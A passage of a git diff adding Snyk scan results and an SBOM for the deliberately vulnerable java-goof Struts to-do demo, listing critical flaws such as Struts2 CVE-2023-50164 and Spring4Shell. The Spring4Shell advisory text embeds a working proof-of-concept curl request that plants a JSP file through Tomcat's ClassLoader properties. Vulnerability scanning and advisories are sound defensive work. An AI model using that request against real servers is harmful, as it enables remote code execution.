"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.322561Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.688470Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) via manipulation of file upload parameters that enable path traversal. Under certain conditions, uploading of a malicious file is possible, which may then be executed on the server.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.33, 6.3.0.2 or higher.\n## References\n- [Apache Mailing List](https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj)\n- [Exploitation Attempts](https://www.akamai.com/blog/security-research/apache-struts-cve-exploitation-attempts)\n- [GitHub Commit](https://github.com/apache/struts/commit/162e29fee9136f4bfd9b2376da2cbf590f9ea163)\n- [GitHub Commit](https://github.com/apache/struts/commit/d8c69691ef1d15e76a5f4fcf33039316da2340b6)\n- [PoC](https://github.com/wy876/POC/blob/main/Apache%20Struts2%20CVE-2023-50164.md)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-066)\n", + "epssDetails": { + "percentile": "0.94639", + "probability": "0.09044", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-50164" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-12-07T11:44:29.902168Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-07T09:45:05Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-12-07T12:27:32.361011Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-23T07:46:17.121104Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:48:43.321Z", + "expires": "2024-08-08T12:48:43.099Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.20.RELEASE", + "org.springframework:spring-beans@5.2.20.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE", + "filtered": { + "ignored": [ + { + "reason": "test", + "created": "2024-07-25T12:49:07.017Z", + "expires": "2024-08-08T12:49:06.669Z", + "ignoredBy": { + "id": "d9b21e67-191b-45cf-9bc0-f82258937fc6", + "name": "austin.doll@snyk.io", + "email": "austin.doll@snyk.io" + }, + "reasonType": "not-vulnerable", + "disregardIfFixable": false, + "source": "api", + "path": [ + "*" + ] + } + ] + } + } + ], + "patch": [] + }, + "uniqueCount": 133, + "projectName": "io.github.snyk:todolist-web-struts", + "displayTargetFile": "pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts" +} diff --git a/todolist-goof/todolist-web-struts/snyk.yaml b/todolist-goof/todolist-web-struts/snyk.yaml new file mode 100644 index 0000000000..0b37cffe81 --- /dev/null +++ b/todolist-goof/todolist-web-struts/snyk.yaml @@ -0,0 +1,5 @@ +version: 2 +customFilters: + filter: ".vulnerabilities |= map(if .type == \"license\" and .id == \"snyk:lic:golang:github.com:hashicorp:consul:GPL-1.0\" then empty else . end)" + pass: "[.vulnerabilities[] | select(.severity == \"critical\")] | length" + msg: "Vulnerabilities found" diff --git a/todolist-goof/todolist-web-struts/test.json b/todolist-goof/todolist-web-struts/test.json new file mode 100644 index 0000000000..8443d2fa9d --- /dev/null +++ b/todolist-goof/todolist-web-struts/test.json @@ -0,0 +1,2 @@ +{"spdxVersion":"SPDX-2.3","dataLicense":"CC0-1.0","SPDXID":"SPDXRef-DOCUMENT","name":"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT","documentNamespace":"https://snyk.io/spdx/sbom-124097e2-e023-4740-b5b3-e390a82c4b99","creationInfo":{"licenseListVersion":"3.19","creators":["Tool: Snyk SBOM Export API v1.89.0-3-g3a337c8","Organization: Snyk","Tool: Snyk snyk-cli 1.1289.0"],"created":"2024-07-29T13:56:32Z"},"packages":[{"name":"io.github.snyk:todolist-web-struts","SPDXID":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","versionInfo":"0.0.1-SNAPSHOT","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/io.github.snyk/todolist-web-struts@0.0.1-SNAPSHOT"}]},{"name":"io.github.snyk:todolist-web-common","SPDXID":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","versionInfo":"0.0.1-SNAPSHOT","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/io.github.snyk/todolist-web-common@0.0.1-SNAPSHOT"}]},{"name":"org.apache.logging.log4j:log4j-core","SPDXID":"SPDXRef-3-org.apache.logging.log4j-log4j-core-2.7","versionInfo":"2.7","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.logging.log4j/log4j-core@2.7"}]},{"name":"org.apache.logging.log4j:log4j-api","SPDXID":"SPDXRef-4-org.apache.logging.log4j-log4j-api-2.7","versionInfo":"2.7","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.logging.log4j/log4j-api@2.7"}]},{"name":"javax:javaee-web-api","SPDXID":"SPDXRef-5-javax-javaee-web-api-7.0","versionInfo":"7.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javax/javaee-web-api@7.0"}]},{"name":"org.springframework:spring-web","SPDXID":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-web@3.2.6.RELEASE"}]},{"name":"org.apache.struts:struts2-core","SPDXID":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","versionInfo":"2.3.20","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.struts/struts2-core@2.3.20"}]},{"name":"org.apache.struts:struts2-spring-plugin","SPDXID":"SPDXRef-8-org.apache.struts-struts2-spring-plugin-2.3.20","versionInfo":"2.3.20","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.struts/struts2-spring-plugin@2.3.20"}]},{"name":"org.zeroturnaround:zt-zip","SPDXID":"SPDXRef-9-org.zeroturnaround-zt-zip-1.12","versionInfo":"1.12","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.zeroturnaround/zt-zip@1.12"}]},{"name":"javax.xml.bind:jaxb-api","SPDXID":"SPDXRef-10-javax.xml.bind-jaxb-api-2.3.0","versionInfo":"2.3.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javax.xml.bind/jaxb-api@2.3.0"}]},{"name":"com.sun.xml.bind:jaxb-core","SPDXID":"SPDXRef-11-com.sun.xml.bind-jaxb-core-2.3.0","versionInfo":"2.3.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.sun.xml.bind/jaxb-core@2.3.0"}]},{"name":"com.sun.xml.bind:jaxb-impl","SPDXID":"SPDXRef-12-com.sun.xml.bind-jaxb-impl-2.3.0","versionInfo":"2.3.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.sun.xml.bind/jaxb-impl@2.3.0"}]},{"name":"com.fasterxml.jackson.core:jackson-core","SPDXID":"SPDXRef-13-com.fasterxml.jackson.core-jackson-core-2.6.5","versionInfo":"2.6.5","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.fasterxml.jackson.core/jackson-core@2.6.5"}]},{"name":"com.fasterxml.jackson.core:jackson-databind","SPDXID":"SPDXRef-14-com.fasterxml.jackson.core-jackson-databind-2.6.5","versionInfo":"2.6.5","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.6.5"}]},{"name":"com.fasterxml.jackson.core:jackson-annotations","SPDXID":"SPDXRef-15-com.fasterxml.jackson.core-jackson-annotations-2.6.5","versionInfo":"2.6.5","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/com.fasterxml.jackson.core/jackson-annotations@2.6.5"}]},{"name":"io.github.snyk:todolist-core","SPDXID":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","versionInfo":"0.0.1-SNAPSHOT","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/io.github.snyk/todolist-core@0.0.1-SNAPSHOT"}]},{"name":"javax.servlet:jstl","SPDXID":"SPDXRef-17-javax.servlet-jstl-1.2","versionInfo":"1.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javax.servlet/jstl@1.2"}]},{"name":"org.hibernate:hibernate-validator","SPDXID":"SPDXRef-18-org.hibernate-hibernate-validator-4.3.1.Final","versionInfo":"4.3.1.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate/hibernate-validator@4.3.1.Final"}]},{"name":"commons-collections:commons-collections","SPDXID":"SPDXRef-19-commons-collections-commons-collections-3.1","versionInfo":"3.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/commons-collections/commons-collections@3.1"}]},{"name":"aopalliance:aopalliance","SPDXID":"SPDXRef-20-aopalliance-aopalliance-1.0","versionInfo":"1.0","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/aopalliance/aopalliance@1.0"}]},{"name":"org.springframework:spring-aop","SPDXID":"SPDXRef-21-org.springframework-spring-aop-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-aop@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-beans","SPDXID":"SPDXRef-22-org.springframework-spring-beans-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-beans@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-context","SPDXID":"SPDXRef-23-org.springframework-spring-context-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-context@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-core","SPDXID":"SPDXRef-24-org.springframework-spring-core-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-core@3.2.6.RELEASE"}]},{"name":"org.apache.struts.xwork:xwork-core","SPDXID":"SPDXRef-25-org.apache.struts.xwork-xwork-core-2.3.20","versionInfo":"2.3.20","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.struts.xwork/xwork-core@2.3.20"}]},{"name":"org.freemarker:freemarker","SPDXID":"SPDXRef-26-org.freemarker-freemarker-2.3.19","versionInfo":"2.3.19","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.freemarker/freemarker@2.3.19"}]},{"name":"ognl:ognl","SPDXID":"SPDXRef-27-ognl-ognl-3.0.6","versionInfo":"3.0.6","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/ognl/ognl@3.0.6"}]},{"name":"commons-fileupload:commons-fileupload","SPDXID":"SPDXRef-28-commons-fileupload-commons-fileupload-1.3.1","versionInfo":"1.3.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/commons-fileupload/commons-fileupload@1.3.1"}]},{"name":"commons-io:commons-io","SPDXID":"SPDXRef-29-commons-io-commons-io-2.2","versionInfo":"2.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/commons-io/commons-io@2.2"}]},{"name":"org.apache.commons:commons-lang3","SPDXID":"SPDXRef-30-org.apache.commons-commons-lang3-3.2","versionInfo":"3.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.apache.commons/commons-lang3@3.2"}]},{"name":"org.slf4j:slf4j-api","SPDXID":"SPDXRef-31-org.slf4j-slf4j-api-1.6.6","versionInfo":"1.6.6","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.slf4j/slf4j-api@1.6.6"}]},{"name":"org.springframework:spring-orm","SPDXID":"SPDXRef-32-org.springframework-spring-orm-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-orm@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-aspects","SPDXID":"SPDXRef-33-org.springframework-spring-aspects-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-aspects@3.2.6.RELEASE"}]},{"name":"cglib:cglib","SPDXID":"SPDXRef-34-cglib-cglib-2.2.2","versionInfo":"2.2.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/cglib/cglib@2.2.2"}]},{"name":"org.aspectj:aspectjweaver","SPDXID":"SPDXRef-35-org.aspectj-aspectjweaver-1.8.2","versionInfo":"1.8.2","supplier"